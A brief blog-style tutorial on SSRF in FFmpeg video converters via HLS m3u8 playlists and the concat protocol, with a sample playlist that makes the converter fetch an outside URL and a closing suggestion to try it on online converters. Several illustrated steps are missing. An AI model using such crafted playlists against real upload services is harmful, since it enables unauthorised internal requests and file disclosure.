i Exploiting SSRF in video converters – All things in moderation

Exploiting SSRF in video converters

Background

  • dozenz of video formats
  • hundreds of video/audio codecs
  • diffrent bitrates, resolutions, etc.

FFmpeg

what is FFmpeg

According wikipedia, FFmpeg is a free software project that produces libraries and programs for handling multimedia data. In a short it’s a tool video converter.

How FFmpeg really works

Look closer to ffmpeg:extension

Play video out.mp4:

HTTP Live Streaming( HLS )

  • Live and on-demand streaming
  • Developed by Apple
  • Support in FFmpeg
  • Docs: https://developer.apple.com/streaming/

m3u8

A file with the M3U8 file extension is a UTF-8 Encoded Audio Playlist file. They are plain text files that can be used by both audio and video players to describe where media files are located. For more https://www.lifewire.com/m3u8-file-2621956

Make an HTTP request


Result:

Read respone

Convert the same above , with content of file heaer.m3u8 like :

#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://hydrasky.com/?.txt
#EXT-X-ENLIST

Here we are:

Exploit

Concat

Concat:reads a binary stream of data from multiple sources interprets them as if they are from the same source.

YUV4MPEG2

File header.y4m located on server localhost/header.y4m

video.mp4

Yesss, It’s work !

Conclusion

  • Solution: FFmpeg protocol whitelist patch
  • With lastest version from > 3.2.2 this vulnerable fixed
  • There are 3 attack vectors you can exploit include: thumbnail, dns or mp4 .
  • The senario simple is upload file video to server support online video converter if it’s using ffmpeg try to exploit

References

https://www.blackhat.com/docs/us-16/materials/us-16-Ermishkin-Viral-Video-Exploiting-Ssrf-In-Video-Converters.pdf

Leave a Reply